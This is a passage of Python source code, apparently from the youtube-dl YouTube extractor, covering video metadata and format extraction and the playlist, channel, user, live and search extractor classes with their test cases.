# Trying to extract metadata from url_encoded_fmt_stream_map entry.
mobj = re.search(r'^(?P<width>\d+)[xX](?P<height>\d+)$', url_data.get('size', [''])[0])
width, height = (int(mobj.group('width')), int(mobj.group('height'))) if mobj else (None, None)
filesize = int_or_none(url_data.get(
'clen', [None])[0]) or _extract_filesize(url)
quality = url_data.get('quality', [None])[0]
more_fields = {
'filesize': filesize,
'tbr': float_or_none(url_data.get('bitrate', [None])[0], 1000),
'width': width,
'height': height,
'fps': int_or_none(url_data.get('fps', [None])[0]),
'format_note': url_data.get('quality_label', [None])[0] or quality,
'quality': q(quality),
}
for key, value in more_fields.items():
if value:
dct[key] = value
type_ = url_data.get('type', [None])[0]
if type_:
type_split = type_.split(';')
kind_ext = type_split[0].split('/')
if len(kind_ext) == 2:
kind, _ = kind_ext
dct['ext'] = mimetype2ext(type_split[0])
if kind in ('audio', 'video'):
codecs = None
for mobj in re.finditer(
r'(?P<key>[a-zA-Z_-]+)=(?P<quote>["\']?)(?P<val>.+?)(?P=quote)(?:;|$)', type_):
if mobj.group('key') == 'codecs':
codecs = mobj.group('val')
break
if codecs:
dct.update(parse_codecs(codecs))
if dct.get('acodec') == 'none' or dct.get('vcodec') == 'none':
dct['downloader_options'] = {
# Youtube throttles chunks >~10M
'http_chunk_size': 10485760,
}
formats.append(dct)
else:
manifest_url = (
url_or_none(try_get(
player_response,
lambda x: x['streamingData']['hlsManifestUrl'],
compat_str)) or
url_or_none(try_get(
video_info, lambda x: x['hlsvp'][0], compat_str)))
if manifest_url:
formats = []
m3u8_formats = self._extract_m3u8_formats(
manifest_url, video_id, 'mp4', fatal=False)
for a_format in m3u8_formats:
itag = self._search_regex(
r'/itag/(\d+)/', a_format['url'], 'itag', default=None)
if itag:
a_format['format_id'] = itag
if itag in self._formats:
dct = self._formats[itag].copy()
dct.update(a_format)
a_format = dct
a_format['player_url'] = player_url
# Accept-Encoding header causes failures in live streams on Youtube and Youtube Gaming
a_format.setdefault('http_headers', {})['Youtubedl-no-compression'] = 'True'
formats.append(a_format)
else:
error_message = clean_html(video_info.get('reason', [None])[0])
if not error_message:
error_message = extract_unavailable_message()
if error_message:
raise ExtractorError(error_message, expected=True)
raise ExtractorError('no conn, hlsvp, hlsManifestUrl or url_encoded_fmt_stream_map information found in video info')
# uploader
video_uploader = try_get(
video_info, lambda x: x['author'][0],
compat_str) or str_or_none(video_details.get('author'))
if video_uploader:
video_uploader = compat_urllib_parse_unquote_plus(video_uploader)
else:
self._downloader.report_warning('unable to extract uploader name')
# uploader_id
video_uploader_id = None
video_uploader_url = None
mobj = re.search(
r'<link itemprop="url" href="(?P<uploader_url>https?://www\.youtube\.com/(?:user|channel)/(?P<uploader_id>[^"]+))">',
video_webpage)
if mobj is not None:
video_uploader_id = mobj.group('uploader_id')
video_uploader_url = mobj.group('uploader_url')
else:
self._downloader.report_warning('unable to extract uploader nickname')
channel_id = self._html_search_meta(
'channelId', video_webpage, 'channel id')
channel_url = 'http://www.youtube.com/channel/%s' % channel_id if channel_id else None
# thumbnail image
# We try first to get a high quality image:
m_thumb = re.search(r'<span itemprop="thumbnail".*?href="(.*?)">',
video_webpage, re.DOTALL)
if m_thumb is not None:
video_thumbnail = m_thumb.group(1)
elif 'thumbnail_url' not in video_info:
self._downloader.report_warning('unable to extract video thumbnail')
video_thumbnail = None
else: # don't panic if we can't find it
video_thumbnail = compat_urllib_parse_unquote_plus(video_info['thumbnail_url'][0])
# upload date
upload_date = self._html_search_meta(
'datePublished', video_webpage, 'upload date', default=None)
if not upload_date:
upload_date = self._search_regex(
[r'(?s)id="eow-date.*?>(.*?)</span>',
r'(?:id="watch-uploader-info".*?>.*?|["\']simpleText["\']\s*:\s*["\'])(?:Published|Uploaded|Streamed live|Started) on (.+?)[<"\']'],
video_webpage, 'upload date', default=None)
upload_date = unified_strdate(upload_date)
video_license = self._html_search_regex(
r'<h4[^>]+class="title"[^>]*>\s*License\s*</h4>\s*<ul[^>]*>\s*<li>(.+?)</li',
video_webpage, 'license', default=None)
m_music = re.search(
r'''(?x)
<h4[^>]+class="title"[^>]*>\s*Music\s*</h4>\s*
<ul[^>]*>\s*
<li>(?P<title>.+?)
by (?P<creator>.+?)
(?:
\(.+?\)|
<a[^>]*
(?:
\bhref=["\']/red[^>]*>| # drop possible
>\s*Listen ad-free with YouTube Red # YouTube Red ad
)
.*?
)?</li
''',
video_webpage)
if m_music:
video_alt_title = remove_quotes(unescapeHTML(m_music.group('title')))
video_creator = clean_html(m_music.group('creator'))
else:
video_alt_title = video_creator = None
def extract_meta(field):
return self._html_search_regex(
r'<h4[^>]+class="title"[^>]*>\s*%s\s*</h4>\s*<ul[^>]*>\s*<li>(.+?)</li>\s*' % field,
video_webpage, field, default=None)
track = extract_meta('Song')
artist = extract_meta('Artist')
m_episode = re.search(
r'<div[^>]+id="watch7-headline"[^>]*>\s*<span[^>]*>.*?>(?P<series>[^<]+)</a></b>\s*S(?P<season>\d+)\s*•\s*E(?P<episode>\d+)</span>',
video_webpage)
if m_episode:
series = unescapeHTML(m_episode.group('series'))
season_number = int(m_episode.group('season'))
episode_number = int(m_episode.group('episode'))
else:
series = season_number = episode_number = None
m_cat_container = self._search_regex(
r'(?s)<h4[^>]*>\s*Category\s*</h4>\s*<ul[^>]*>(.*?)</ul>',
video_webpage, 'categories', default=None)
if m_cat_container:
category = self._html_search_regex(
r'(?s)<a[^<]+>(.*?)</a>', m_cat_container, 'category',
default=None)
video_categories = None if category is None else [category]
else:
video_categories = None
video_tags = [
unescapeHTML(m.group('content'))
for m in re.finditer(self._meta_regex('og:video:tag'), video_webpage)]
def _extract_count(count_name):
return str_to_int(self._search_regex(
r'-%s-button[^>]+><span[^>]+class="yt-uix-button-content"[^>]*>([\d,]+)</span>'
% re.escape(count_name),
video_webpage, count_name, default=None))
like_count = _extract_count('like')
dislike_count = _extract_count('dislike')
if view_count is None:
view_count = str_to_int(self._search_regex(
r'<[^>]+class=["\']watch-view-count[^>]+>\s*([\d,\s]+)', video_webpage,
'view count', default=None))
# subtitles
video_subtitles = self.extract_subtitles(video_id, video_webpage)
automatic_captions = self.extract_automatic_captions(video_id, video_webpage)
video_duration = try_get(
video_info, lambda x: int_or_none(x['length_seconds'][0]))
if not video_duration:
video_duration = int_or_none(video_details.get('lengthSeconds'))
if not video_duration:
video_duration = parse_duration(self._html_search_meta(
'duration', video_webpage, 'video duration'))
# annotations
video_annotations = None
if self._downloader.params.get('writeannotations', False):
video_annotations = self._extract_annotations(video_id)
chapters = self._extract_chapters(description_original, video_duration)
# Look for the DASH manifest
if self._downloader.params.get('youtube_include_dash_manifest', True):
dash_mpd_fatal = True
for mpd_url in dash_mpds:
dash_formats = {}
try:
def decrypt_sig(mobj):
s = mobj.group(1)
dec_s = self._decrypt_signature(s, video_id, player_url, age_gate)
return '/signature/%s' % dec_s
mpd_url = re.sub(r'/s/([a-fA-F0-9\.]+)', decrypt_sig, mpd_url)
for df in self._extract_mpd_formats(
mpd_url, video_id, fatal=dash_mpd_fatal,
formats_dict=self._formats):
if not df.get('filesize'):
df['filesize'] = _extract_filesize(df['url'])
# Do not overwrite DASH format found in some previous DASH manifest
if df['format_id'] not in dash_formats:
dash_formats[df['format_id']] = df
# Additional DASH manifests may end up in HTTP Error 403 therefore
# allow them to fail without bug report message if we already have
# some DASH manifest succeeded. This is temporary workaround to reduce
# burst of bug reports until we figure out the reason and whether it
# can be fixed at all.
dash_mpd_fatal = False
except (ExtractorError, KeyError) as e:
self.report_warning(
'Skipping DASH manifest: %r' % e, video_id)
if dash_formats:
# Remove the formats we found through non-DASH, they
# contain less info and it can be wrong, because we use
# fixed values (for example the resolution). See
# https://github.com/ytdl-org/youtube-dl/issues/5774 for an
# example.
formats = [f for f in formats if f['format_id'] not in dash_formats.keys()]
formats.extend(dash_formats.values())
# Check for malformed aspect ratio
stretched_m = re.search(
r'<meta\s+property="og:video:tag".*?content="yt:stretch=(?P<w>[0-9]+):(?P<h>[0-9]+)">',
video_webpage)
if stretched_m:
w = float(stretched_m.group('w'))
h = float(stretched_m.group('h'))
# yt:stretch may hold invalid ratio data (e.g. for Q39EVAstoRM ratio is 17:0).
# We will only process correct ratios.
if w > 0 and h > 0:
ratio = w / h
for f in formats:
if f.get('vcodec') != 'none':
f['stretched_ratio'] = ratio
self._sort_formats(formats)
self.mark_watched(video_id, video_info, player_response)
return {
'id': video_id,
'uploader': video_uploader,
'uploader_id': video_uploader_id,
'uploader_url': video_uploader_url,
'channel_id': channel_id,
'channel_url': channel_url,
'upload_date': upload_date,
'license': video_license,
'creator': video_creator or artist,
'title': video_title,
'alt_title': video_alt_title or track,
'thumbnail': video_thumbnail,
'description': video_description,
'categories': video_categories,
'tags': video_tags,
'subtitles': video_subtitles,
'automatic_captions': automatic_captions,
'duration': video_duration,
'age_limit': 18 if age_gate else 0,
'annotations': video_annotations,
'chapters': chapters,
'webpage_url': proto + '://www.youtube.com/watch?v=%s' % video_id,
'view_count': view_count,
'like_count': like_count,
'dislike_count': dislike_count,
'average_rating': float_or_none(video_info.get('avg_rating', [None])[0]),
'formats': formats,
'is_live': is_live,
'start_time': start_time,
'end_time': end_time,
'series': series,
'season_number': season_number,
'episode_number': episode_number,
'track': track,
'artist': artist,
}
class YoutubePlaylistIE(YoutubePlaylistBaseInfoExtractor):
IE_DESC = 'YouTube.com playlists'
_VALID_URL = r"""(?x)(?:
(?:https?://)?
(?:\w+\.)?
(?:
(?:
youtube\.com|
invidio\.us
)
/
(?:
(?:course|view_play_list|my_playlists|artist|playlist|watch|embed/(?:videoseries|[0-9A-Za-z_-]{11}))
\? (?:.*?[&;])*? (?:p|a|list)=
| p/
)|
youtu\.be/[0-9A-Za-z_-]{11}\?.*?\blist=
)
(
(?:PL|LL|EC|UU|FL|RD|UL|TL|OLAK5uy_)?[0-9A-Za-z-_]{10,}
# Top tracks, they can also include dots
|(?:MC)[\w\.]*
)
.*
|
(%(playlist_id)s)
)""" % {'playlist_id': YoutubeBaseInfoExtractor._PLAYLIST_ID_RE}
_TEMPLATE_URL = 'https://www.youtube.com/playlist?list=%s'
_VIDEO_RE = r'href="\s*/watch\?v=(?P<id>[0-9A-Za-z_-]{11})&[^"]*?index=(?P<index>\d+)(?:[^>]+>(?P<title>[^<]+))?'
IE_NAME = 'youtube:playlist'
_TESTS = [{
'url': 'https://www.youtube.com/playlist?list=PLwiyx1dc3P2JR9N8gQaQN_BCvlSlap7re',
'info_dict': {
'title': 'ytdl test PL',
'id': 'PLwiyx1dc3P2JR9N8gQaQN_BCvlSlap7re',
},
'playlist_count': 3,
}, {
'url': 'https://www.youtube.com/playlist?list=PLtPgu7CB4gbZDA7i_euNxn75ISqxwZPYx',
'info_dict': {
'id': 'PLtPgu7CB4gbZDA7i_euNxn75ISqxwZPYx',
'title': 'YDL_Empty_List',
},
'playlist_count': 0,
'skip': 'This playlist is private',
}, {
'note': 'Playlist with deleted videos (#651). As a bonus, the video #51 is also twice in this list.',
'url': 'https://www.youtube.com/playlist?list=PLwP_SiAcdui0KVebT0mU9Apz359a4ubsC',
'info_dict': {
'title': '29C3: Not my department',
'id': 'PLwP_SiAcdui0KVebT0mU9Apz359a4ubsC',
},
'playlist_count': 95,
}, {
'note': 'issue #673',
'url': 'PLBB231211A4F62143',
'info_dict': {
'title': '[OLD]Team Fortress 2 (Class-based LP)',
'id': 'PLBB231211A4F62143',
},
'playlist_mincount': 26,
}, {
'note': 'Large playlist',
'url': 'https://www.youtube.com/playlist?list=UUBABnxM4Ar9ten8Mdjj1j0Q',
'info_dict': {
'title': 'Uploads from Cauchemar',
'id': 'UUBABnxM4Ar9ten8Mdjj1j0Q',
},
'playlist_mincount': 799,
}, {
'url': 'PLtPgu7CB4gbY9oDN3drwC3cMbJggS7dKl',
'info_dict': {
'title': 'YDL_safe_search',
'id': 'PLtPgu7CB4gbY9oDN3drwC3cMbJggS7dKl',
},
'playlist_count': 2,
'skip': 'This playlist is private',
}, {
'note': 'embedded',
'url': 'https://www.youtube.com/embed/videoseries?list=PL6IaIsEjSbf96XFRuNccS_RuEXwNdsoEu',
'playlist_count': 4,
'info_dict': {
'title': 'JODA15',
'id': 'PL6IaIsEjSbf96XFRuNccS_RuEXwNdsoEu',
}
}, {
'url': 'http://www.youtube.com/embed/_xDOZElKyNU?list=PLsyOSbh5bs16vubvKePAQ1x3PhKavfBIl',
'playlist_mincount': 485,
'info_dict': {
'title': '2017 華語最新單曲 (2/24更新)',
'id': 'PLsyOSbh5bs16vubvKePAQ1x3PhKavfBIl',
}
}, {
'note': 'Embedded SWF player',
'url': 'https://www.youtube.com/p/YN5VISEtHet5D4NEvfTd0zcgFk84NqFZ?hl=en_US&fs=1&rel=0',
'playlist_count': 4,
'info_dict': {
'title': 'JODA7',
'id': 'YN5VISEtHet5D4NEvfTd0zcgFk84NqFZ',
}
}, {
'note': 'Buggy playlist: the webpage has a "Load more" button but it doesn\'t have more videos',
'url': 'https://www.youtube.com/playlist?list=UUXw-G3eDE9trcvY2sBMM_aA',
'info_dict': {
'title': 'Uploads from Interstellar Movie',
'id': 'UUXw-G3eDE9trcvY2sBMM_aA',
},
'playlist_mincount': 21,
}, {
# Playlist URL that does not actually serve a playlist
'url': 'https://www.youtube.com/watch?v=FqZTN594JQw&list=PLMYEtVRpaqY00V9W81Cwmzp6N6vZqfUKD4',
'info_dict': {
'id': 'FqZTN594JQw',
'ext': 'webm',
'title': "Smiley's People 01 detective, Adventure Series, Action",
'uploader': 'STREEM',
'uploader_id': 'UCyPhqAZgwYWZfxElWVbVJng',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/channel/UCyPhqAZgwYWZfxElWVbVJng',
'upload_date': '20150526',
'license': 'Standard YouTube License',
'description': 'md5:507cdcb5a49ac0da37a920ece610be80',
'categories': ['People & Blogs'],
'tags': list,
'view_count': int,
'like_count': int,
'dislike_count': int,
},
'params': {
'skip_download': True,
},
'add_ie': [YoutubeIE.ie_key()],
}, {
'url': 'https://youtu.be/yeWKywCrFtk?list=PL2qgrgXsNUG5ig9cat4ohreBjYLAPC0J5',
'info_dict': {
'id': 'yeWKywCrFtk',
'ext': 'mp4',
'title': 'Small Scale Baler and Braiding Rugs',
'uploader': 'Backus-Page House Museum',
'uploader_id': 'backuspagemuseum',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/backuspagemuseum',
'upload_date': '20161008',
'license': 'Standard YouTube License',
'description': 'md5:800c0c78d5eb128500bffd4f0b4f2e8a',
'categories': ['Nonprofits & Activism'],
'tags': list,
'like_count': int,
'dislike_count': int,
},
'params': {
'noplaylist': True,
'skip_download': True,
},
}, {
'url': 'https://youtu.be/uWyaPkt-VOI?list=PL9D9FC436B881BA21',
'only_matching': True,
}, {
'url': 'TLGGrESM50VT6acwMjAyMjAxNw',
'only_matching': True,
}, {
# music album playlist
'url': 'OLAK5uy_m4xAFdmMC5rX3Ji3g93pQe3hqLZw_9LhM',
'only_matching': True,
}, {
'url': 'https://invidio.us/playlist?list=PLDIoUOhQQPlXr63I_vwF9GD8sAKh77dWU',
'only_matching': True,
}]
def _real_initialize(self):
self._login()
def _extract_mix(self, playlist_id):
# The mixes are generated from a single video
# the id of the playlist is just 'RD' + video_id
ids = []
last_id = playlist_id[-11:]
for n in itertools.count(1):
url = 'https://youtube.com/watch?v=%s&list=%s' % (last_id, playlist_id)
webpage = self._download_webpage(
url, playlist_id, 'Downloading page {0} of Youtube mix'.format(n))
new_ids = orderedSet(re.findall(
r'''(?xs)data-video-username=".*?".*?
href="/watch\?v=([0-9A-Za-z_-]{11})&[^"]*?list=%s''' % re.escape(playlist_id),
webpage))
# Fetch new pages until all the videos are repeated, it seems that
# there are always 51 unique videos.
new_ids = [_id for _id in new_ids if _id not in ids]
if not new_ids:
break
ids.extend(new_ids)
last_id = ids[-1]
url_results = self._ids_to_results(ids)
search_title = lambda class_name: get_element_by_attribute('class', class_name, webpage)
title_span = (
search_title('playlist-title') or
search_title('title long-title') or
search_title('title'))
title = clean_html(title_span)
return self.playlist_result(url_results, playlist_id, title)
def _extract_playlist(self, playlist_id):
url = self._TEMPLATE_URL % playlist_id
page = self._download_webpage(url, playlist_id)
# the yt-alert-message now has tabindex attribute (see https://github.com/ytdl-org/youtube-dl/issues/11604)
for match in re.findall(r'<div class="yt-alert-message"[^>]*>([^<]+)</div>', page):
match = match.strip()
# Check if the playlist exists or is private
mobj = re.match(r'[^<]*(?:The|This) playlist (?P<reason>does not exist|is private)[^<]*', match)
if mobj:
reason = mobj.group('reason')
message = 'This playlist %s' % reason
if 'private' in reason:
message += ', use --username or --netrc to access it'
message += '.'
raise ExtractorError(message, expected=True)
elif re.match(r'[^<]*Invalid parameters[^<]*', match):
raise ExtractorError(
'Invalid parameters. Maybe URL is incorrect.',
expected=True)
elif re.match(r'[^<]*Choose your language[^<]*', match):
continue
else:
self.report_warning('Youtube gives an alert message: ' + match)
playlist_title = self._html_search_regex(
r'(?s)<h1 class="pl-header-title[^"]*"[^>]*>\s*(.*?)\s*</h1>',
page, 'title', default=None)
_UPLOADER_BASE = r'class=["\']pl-header-details[^>]+>\s*<li>\s*<a[^>]+\bhref='
uploader = self._search_regex(
r'%s["\']/(?:user|channel)/[^>]+>([^<]+)' % _UPLOADER_BASE,
page, 'uploader', default=None)
mobj = re.search(
r'%s(["\'])(?P<path>/(?:user|channel)/(?P<uploader_id>.+?))\1' % _UPLOADER_BASE,
page)
if mobj:
uploader_id = mobj.group('uploader_id')
uploader_url = compat_urlparse.urljoin(url, mobj.group('path'))
else:
uploader_id = uploader_url = None
has_videos = True
if not playlist_title:
try:
# Some playlist URLs don't actually serve a playlist (e.g.
# https://www.youtube.com/watch?v=FqZTN594JQw&list=PLMYEtVRpaqY00V9W81Cwmzp6N6vZqfUKD4)
next(self._entries(page, playlist_id))
except StopIteration:
has_videos = False
playlist = self.playlist_result(
self._entries(page, playlist_id), playlist_id, playlist_title)
playlist.update({
'uploader': uploader,
'uploader_id': uploader_id,
'uploader_url': uploader_url,
})
return has_videos, playlist
def _check_download_just_video(self, url, playlist_id):
# Check if it's a video-specific URL
query_dict = compat_urlparse.parse_qs(compat_urlparse.urlparse(url).query)
video_id = query_dict.get('v', [None])[0] or self._search_regex(
r'(?:(?:^|//)youtu\.be/|youtube\.com/embed/(?!videoseries))([0-9A-Za-z_-]{11})', url,
'video id', default=None)
if video_id:
if self._downloader.params.get('noplaylist'):
self.to_screen('Downloading just video %s because of --no-playlist' % video_id)
return video_id, self.url_result(video_id, 'Youtube', video_id=video_id)
else:
self.to_screen('Downloading playlist %s - add --no-playlist to just download video %s' % (playlist_id, video_id))
return video_id, None
return None, None
def _real_extract(self, url):
# Extract playlist id
mobj = re.match(self._VALID_URL, url)
if mobj is None:
raise ExtractorError('Invalid URL: %s' % url)
playlist_id = mobj.group(1) or mobj.group(2)
video_id, video = self._check_download_just_video(url, playlist_id)
if video:
return video
if playlist_id.startswith(('RD', 'UL', 'PU')):
# Mixes require a custom extraction process
return self._extract_mix(playlist_id)
has_videos, playlist = self._extract_playlist(playlist_id)
if has_videos or not video_id:
return playlist
# Some playlist URLs don't actually serve a playlist (see
# https://github.com/ytdl-org/youtube-dl/issues/10537).
# Fallback to plain video extraction if there is a video id
# along with playlist id.
return self.url_result(video_id, 'Youtube', video_id=video_id)
class YoutubeChannelIE(YoutubePlaylistBaseInfoExtractor):
IE_DESC = 'YouTube.com channels'
_VALID_URL = r'https?://(?:youtu\.be|(?:\w+\.)?youtube(?:-nocookie)?\.com|(?:www\.)?invidio\.us)/channel/(?P<id>[0-9A-Za-z_-]+)'
_TEMPLATE_URL = 'https://www.youtube.com/channel/%s/videos'
_VIDEO_RE = r'(?:title="(?P<title>[^"]+)"[^>]+)?href="/watch\?v=(?P<id>[0-9A-Za-z_-]+)&?'
IE_NAME = 'youtube:channel'
_TESTS = [{
'note': 'paginated channel',
'url': 'https://www.youtube.com/channel/UCKfVa3S1e4PHvxWcwyMMg8w',
'playlist_mincount': 91,
'info_dict': {
'id': 'UUKfVa3S1e4PHvxWcwyMMg8w',
'title': 'Uploads from lex will',
}
}, {
'note': 'Age restricted channel',
# from https://www.youtube.com/user/DeusExOfficial
'url': 'https://www.youtube.com/channel/UCs0ifCMCm1icqRbqhUINa0w',
'playlist_mincount': 64,
'info_dict': {
'id': 'UUs0ifCMCm1icqRbqhUINa0w',
'title': 'Uploads from Deus Ex',
},
}, {
'url': 'https://invidio.us/channel/UC23qupoDRn9YOAVzeoxjOQA',
'only_matching': True,
}]
@classmethod
def suitable(cls, url):
return (False if YoutubePlaylistsIE.suitable(url) or YoutubeLiveIE.suitable(url)
else super(YoutubeChannelIE, cls).suitable(url))
def _build_template_url(self, url, channel_id):
return self._TEMPLATE_URL % channel_id
def _real_extract(self, url):
channel_id = self._match_id(url)
url = self._build_template_url(url, channel_id)
# Channel by page listing is restricted to 35 pages of 30 items, i.e. 1050 videos total (see #5778)
# Workaround by extracting as a playlist if managed to obtain channel playlist URL
# otherwise fallback on channel by page extraction
channel_page = self._download_webpage(
url + '?view=57', channel_id,
'Downloading channel page', fatal=False)
if channel_page is False:
channel_playlist_id = False
else:
channel_playlist_id = self._html_search_meta(
'channelId', channel_page, 'channel id', default=None)
if not channel_playlist_id:
channel_url = self._html_search_meta(
('al:ios:url', 'twitter:app:url:iphone', 'twitter:app:url:ipad'),
channel_page, 'channel url', default=None)
if channel_url:
channel_playlist_id = self._search_regex(
r'vnd\.youtube://user/([0-9A-Za-z_-]+)',
channel_url, 'channel id', default=None)
if channel_playlist_id and channel_playlist_id.startswith('UC'):
playlist_id = 'UU' + channel_playlist_id[2:]
return self.url_result(
compat_urlparse.urljoin(url, '/playlist?list=%s' % playlist_id), 'YoutubePlaylist')
channel_page = self._download_webpage(url, channel_id, 'Downloading page #1')
autogenerated = re.search(r'''(?x)
class="[^"]*?(?:
channel-header-autogenerated-label|
yt-channel-title-autogenerated
)[^"]*"''', channel_page) is not None
if autogenerated:
# The videos are contained in a single page
# the ajax pages can't be used, they are empty
entries = [
self.url_result(
video_id, 'Youtube', video_id=video_id,
video_title=video_title)
for video_id, video_title in self.extract_videos_from_page(channel_page)]
return self.playlist_result(entries, channel_id)
try:
next(self._entries(channel_page, channel_id))
except StopIteration:
alert_message = self._html_search_regex(
r'(?s)<div[^>]+class=(["\']).*?\byt-alert-message\b.*?\1[^>]*>(?P<alert>[^<]+)</div>',
channel_page, 'alert', default=None, group='alert')
if alert_message:
raise ExtractorError('Youtube said: %s' % alert_message, expected=True)
return self.playlist_result(self._entries(channel_page, channel_id), channel_id)
class YoutubeUserIE(YoutubeChannelIE):
IE_DESC = 'YouTube.com user videos (URL or "ytuser" keyword)'
_VALID_URL = r'(?:(?:https?://(?:\w+\.)?youtube\.com/(?:(?P<user>user|c)/)?(?!(?:attribution_link|watch|results|shared)(?:$|[^a-z_A-Z0-9-])))|ytuser:)(?!feed/)(?P<id>[A-Za-z0-9_-]+)'
_TEMPLATE_URL = 'https://www.youtube.com/%s/%s/videos'
IE_NAME = 'youtube:user'
_TESTS = [{
'url': 'https://www.youtube.com/user/TheLinuxFoundation',
'playlist_mincount': 320,
'info_dict': {
'id': 'UUfX55Sx5hEFjoC3cNs6mCUQ',
'title': 'Uploads from The Linux Foundation',
}
}, {
# Only available via https://www.youtube.com/c/12minuteathlete/videos
# but not https://www.youtube.com/user/12minuteathlete/videos
'url': 'https://www.youtube.com/c/12minuteathlete/videos',
'playlist_mincount': 249,
'info_dict': {
'id': 'UUVjM-zV6_opMDx7WYxnjZiQ',
'title': 'Uploads from 12 Minute Athlete',
}
}, {
'url': 'ytuser:phihag',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/c/gametrailers',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/gametrailers',
'only_matching': True,
}, {
# This channel is not available, geo restricted to JP
'url': 'https://www.youtube.com/user/kananishinoSMEJ/videos',
'only_matching': True,
}]
@classmethod
def suitable(cls, url):
# Don't return True if the url can be extracted with other youtube
# extractor, the regex would is too permissive and it would match.
other_yt_ies = iter(klass for (name, klass) in globals().items() if name.startswith('Youtube') and name.endswith('IE') and klass is not cls)
if any(ie.suitable(url) for ie in other_yt_ies):
return False
else:
return super(YoutubeUserIE, cls).suitable(url)
def _build_template_url(self, url, channel_id):
mobj = re.match(self._VALID_URL, url)
return self._TEMPLATE_URL % (mobj.group('user') or 'user', mobj.group('id'))
class YoutubeLiveIE(YoutubeBaseInfoExtractor):
IE_DESC = 'YouTube.com live streams'
_VALID_URL = r'(?P<base_url>https?://(?:\w+\.)?youtube\.com/(?:(?:user|channel|c)/)?(?P<id>[^/]+))/live'
IE_NAME = 'youtube:live'
_TESTS = [{
'url': 'https://www.youtube.com/user/TheYoungTurks/live',
'info_dict': {
'id': 'a48o2S1cPoo',
'ext': 'mp4',
'title': 'The Young Turks - Live Main Show',
'uploader': 'The Young Turks',
'uploader_id': 'TheYoungTurks',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/TheYoungTurks',
'upload_date': '20150715',
'license': 'Standard YouTube License',
'description': 'md5:438179573adcdff3c97ebb1ee632b891',
'categories': ['News & Politics'],
'tags': ['Cenk Uygur (TV Program Creator)', 'The Young Turks (Award-Winning Work)', 'Talk Show (TV Genre)'],
'like_count': int,
'dislike_count': int,
},
'params': {
'skip_download': True,
},
}, {
'url': 'https://www.youtube.com/channel/UC1yBKRuGpC1tSM73A0ZjYjQ/live',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/c/CommanderVideoHq/live',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/TheYoungTurks/live',
'only_matching': True,
}]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
channel_id = mobj.group('id')
base_url = mobj.group('base_url')
webpage = self._download_webpage(url, channel_id, fatal=False)
if webpage:
page_type = self._og_search_property(
'type', webpage, 'page type', default='')
video_id = self._html_search_meta(
'videoId', webpage, 'video id', default=None)
if page_type.startswith('video') and video_id and re.match(
r'^[0-9A-Za-z_-]{11}$', video_id):
return self.url_result(video_id, YoutubeIE.ie_key())
return self.url_result(base_url)
class YoutubePlaylistsIE(YoutubePlaylistsBaseInfoExtractor):
IE_DESC = 'YouTube.com user/channel playlists'
_VALID_URL = r'https?://(?:\w+\.)?youtube\.com/(?:user|channel)/(?P<id>[^/]+)/playlists'
IE_NAME = 'youtube:playlists'
_TESTS = [{
'url': 'https://www.youtube.com/user/ThirstForScience/playlists',
'playlist_mincount': 4,
'info_dict': {
'id': 'ThirstForScience',
'title': 'Thirst for Science',
},
}, {
# with "Load more" button
'url': 'https://www.youtube.com/user/igorkle1/playlists?view=1&sort=dd',
'playlist_mincount': 70,
'info_dict': {
'id': 'igorkle1',
'title': 'Игорь Клейнер',
},
}, {
'url': 'https://www.youtube.com/channel/UCiU1dHvZObB2iP6xkJ__Icw/playlists',
'playlist_mincount': 17,
'info_dict': {
'id': 'UCiU1dHvZObB2iP6xkJ__Icw',
'title': 'Chem Player',
},
}]
class YoutubeSearchBaseInfoExtractor(YoutubePlaylistBaseInfoExtractor):
_VIDEO_RE = r'href="\s*/watch\?v=(?P<id>[0-9A-Za-z_-]{11})(?:[^"]*"[^>]+\btitle="(?P<title>[^"]+))?'
class YoutubeSearchIE(SearchInfoExtractor, YoutubeSearchBaseInfoExtractor):
IE_DESC = 'YouTube.com searches'
# there doesn't appear to be a real limit, for example if you search for
# 'python' you get more than 8.000.000 results
_MAX_RESULTS = float('inf')
IE_NAME = 'youtube:search'
_SEARCH_KEY = 'ytsearch'
_EXTRA_QUERY_ARGS = {}
_TESTS = []
def _get_n_results(self, query, n):
"""Get a specified number of results for a query"""
videos = []
limit = n
url_query = {
'search_query': query.encode('utf-8'),
}
url_query.update(self._EXTRA_QUERY_ARGS)
result_url = 'https://www.youtube.com/results?' + compat_urllib_parse_urlencode(url_query)
for pagenum in itertools.count(1):
data = self._download_json(
result_url, video_id='query "%s"' % query,
note='Downloading page %s' % pagenum,
errnote='Unable to download API page',
query={'spf': 'navigate'})
html_content = data[1]['body']['content']
if 'class="search-message' in html_content:
raise ExtractorError(
'[youtube] No video results', expected=True)
new_videos = list(self._process_page(html_content))
videos += new_videos
if not new_videos or len(videos) > limit:
break
next_link = self._html_search_regex(
r'href="(/results\?[^"]*\bsp=[^"]+)"[^>]*>\s*<span[^>]+class="[^"]*\byt-uix-button-content\b[^"]*"[^>]*>Next',
html_content, 'next link', default=None)
if next_link is None:
break
result_url = compat_urlparse.urljoin('https://www.youtube.com/', next_link)
if len(videos) > n:
videos = videos[:n]
return self.playlist_result(videos, query)
class YoutubeSearchDateIE(YoutubeSearchIE):
IE_NAME = YoutubeSearchIE.IE_NAME + ':date'
_SEARCH_KEY = 'ytsearchdate'
IE_DESC = 'YouTube.com searches, newest videos first'
_EXTRA_QUERY_ARGS = {'search_sort': 'video_date_uploaded'}
class YoutubeSearchURLIE(YoutubeSearchBaseInfoExtractor):
IE_DESC = 'YouTube.com search URLs'
IE_NAME = 'youtube:search_url'
_VALID_URL = r'https?://(?:www\.)?youtube\.com/results\?(.*?&)?(?:search_query|q)=(?P<query>[^&]+)(?:[&]|$)'
_TESTS = [{
'url': 'https://www.youtube.com/results?baz=bar&search_query=youtube-dl+test+video&filters=video&lclk=video',
'playlist_mincount': 5,
'info_dict': {
'title': 'youtube-dl test video',
}
}, {
'url': 'https://www.youtube.com/results?q=test&sp=EgQIBBgB',
'only_matching': True,
}]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
query = compat_urllib_parse_unquote_plus(mobj.group('query'))
webpage = self._download_webpage(url, query)
return self.playlist_result(self._process_page(webpage), playlist_title=query)
class YoutubeShowIE(YoutubePlaylistsBaseInfoExtractor):
